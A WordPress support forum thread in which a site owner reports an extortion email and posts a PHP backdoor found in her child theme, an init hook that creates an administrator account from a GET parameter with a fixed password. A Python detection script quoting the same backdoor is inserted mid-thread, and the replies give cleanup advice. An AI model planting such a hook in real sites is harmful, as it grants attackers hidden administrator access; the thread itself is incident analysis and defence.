• Hello,

    On Saturday morning we received an email saying that our database has been compromised, and threatening to sell it to the highest bidder etc.

    I would normally think that this is some kind of hoax, except for the fact that last week there was an error on the website where the website would not load and there was an error message saying that there was an error in the database – there was a link to repair database tables. (Does this sometimes happen with WordPress?)

    It makes me wonder if maybe the link to repairing database tables was a hack, or if the error itself was due to the hackers gaining access to our database.

    Do you think this could be possible?

    This morning when I was alerted to this email I started scanning our site for malware and found the following code in our child theme functions.php – which seems to be a hack:

    add_action('init', 'hjklmopn');

    function hjklmopn() {
        if ( isset( $_GET['doomwpl'] ) ) {
            $userdata = array(
                'user_login' => $_GET['doomwpl'],
                'user_url'   => 'joinme.com',
                'user_pass'  => 'doomwp',
                'role'       => 'administrator'
            );
            $user_id  = wp_insert_user( $userdata );
            if ( !is_wp_error( $user_id ) ) {
                var_dump($userdata, $user_id);
            }
            die();
        }
    }


    I thought that it sounds like it has retrieved role and password information from users of the website – but do you think it is just administrator accounts?

    Thanks for your help.

    As I am not fluent in PHP I am not sure what the malicious code has instructed the website to do.

    The rest of our scanners show that there is no additional malware on the site, and it seems that there was a vulnerability in our theme builder, so perhaps that is how they got into functions.php.

    Do you think there are any other ways they could have gotten access to functions.php?

    Thanks so much!
    Sarah

    • This topic was modified 2 years, 1 month ago by Jan Dembowski. Reason: Moved to Fixing WordPress, this is not a Developing with WordPress topic
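A defender-side triage script for the kind of backdoor pasted above, added here as an example; it is not code from the thread, from WordPress or from any plugin. It reports a PHP file only when programmatic user creation, the administrator role and request-controlled input all appear together, so an ordinary theme that merely hooks init is not flagged; the directory it scans is an assumption.

```python
import re
from pathlib import Path

# Constructed sample reproducing the backdoor posted above (trimmed to its essential lines).
SAMPLE_BACKDOOR = r"""<?php
add_action('init', 'hjklmopn');
function hjklmopn() {
    if ( isset( $_GET['doomwpl'] ) ) {
        $userdata = array(
            'user_login' => $_GET['doomwpl'],
            'user_pass'  => 'doomwp',
            'role'       => 'administrator'
        );
        $user_id = wp_insert_user( $userdata );
        die();
    }
}
"""
# Constructed benign sample: a theme hooking 'init' is not suspicious on its own.
SAMPLE_BENIGN = r"""<?php
add_action('init', 'register_book_post_type');
function register_book_post_type() {
    register_post_type('book', array('public' => true));
}
"""

# Indicator name -> regex. No single one proves compromise; the combination does.
INDICATORS = {
    "init_hook":     re.compile(r"add_action\s*\(\s*['\"]init['\"]"),       # runs on every request
    "request_input": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),      # attacker-controlled input
    "insert_user":   re.compile(r"\bwp_insert_user\s*\("),                  # creates an account
    "admin_role":    re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]"),
    "early_exit":    re.compile(r"\b(die|exit)\s*\("),                      # hides itself by killing the page
}

def find_indicators(src: str) -> set:
    """Return the names of all indicators present in one PHP source string."""
    return {name for name, pat in INDICATORS.items() if pat.search(src)}
def is_admin_backdoor(src: str) -> bool:
    """User creation + administrator role + request-controlled input = account backdoor."""
    return {"insert_user", "admin_role", "request_input"} <= find_indicators(src)
def scan_tree(root: str) -> list:
    """Scan every .php file under root (e.g. wp-content/themes) and return (path, indicators) for hits."""
    hits = []
    for path in Path(root).rglob("*.php"):
        src = path.read_text(errors="replace")
        if is_admin_backdoor(src):
            hits.append((str(path), sorted(find_indicators(src))))
    return hits
```

Call scan_tree("wp-content") from the WordPress root (an assumed path); a hit is a file to diff against a clean copy of the theme or plugin, not proof on its own.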
Viewing 4 replies - 1 through 4 (of 4 total)
  • Hi,
    Maybe the hacker has used an outdated plugin vulnerability to get access to a function file so that the hacker can add code to create a new user and assign it an admin role, so remove the code and ask your hosting provider to scan the server; there are many cases where, when you are on shared hosting, your site can be hacked.

    Try to keep your plugins, themes and WordPress version up to date, and reset the database password and update it in the wp-config.php file. Also check in the database whether any unauthorized user has been created; if so, remove it. Or move your files and database to the cloud, because cloud hosting like RDS on AWS provides database encryption, and many other providers do too.

    And don’t forget to take a backup of the website files and database on a weekly basis, and use a security plugin as well.

    Thread Starter sarahjsouris

    (@sarahjsouris)

    Hello @dineshpilani05 !

    Thanks so much for your reply. I appreciate your help.

    Could you please confirm that the code I posted above would be used to insert a user into wp-admin, and not to generate a list of all our users’ data?

    Do you think that it is possible that this user is hidden? Although I checked the database this afternoon – they have not been added as a user in the database.

    I have updated all the plugins, themes etc. I will definitely stay on top of it!

    And we do regular backups.

    Thanks so much!
    Sarah

    This code simply inserts the user into the wp_users table with the name doomwpl and assigns it an admin role. The user cannot be hidden, but you should remove this code, because if there is a user present in the table of the database and you remove it, it will automatically be created again when the website loads, so it’s better to remove the user, because the hook init runs after WordPress has finished loading but before any headers are sent.

    Could you please confirm that the code I posted above would be used to insert a user into wp-admin, and not to generate a list of all our users’ data?

    Is there a valid reason why this code might have been inserted into the child theme?

    If not:

    – change all passwords for strong random ones (WP dashboard, cPanel, database)
    – change the salt keys in wp-config.php to log out all users
    – audit your plugins for those that are no longer maintained and receiving updates
    – scan the site with the Wordfence and GOTMLS security plugins
    – install a security plugin (e.g. NinjaFirewall) that can email a notification when a new user is created, a plugin or theme is uploaded, a user logs in, etc.
    – take regular off-site backups

    • This reply was modified 2 years, 1 month ago by barnez. Reason: OP already takes regular backups
  • The topic ‘Potential database hacking’ is closed to new replies.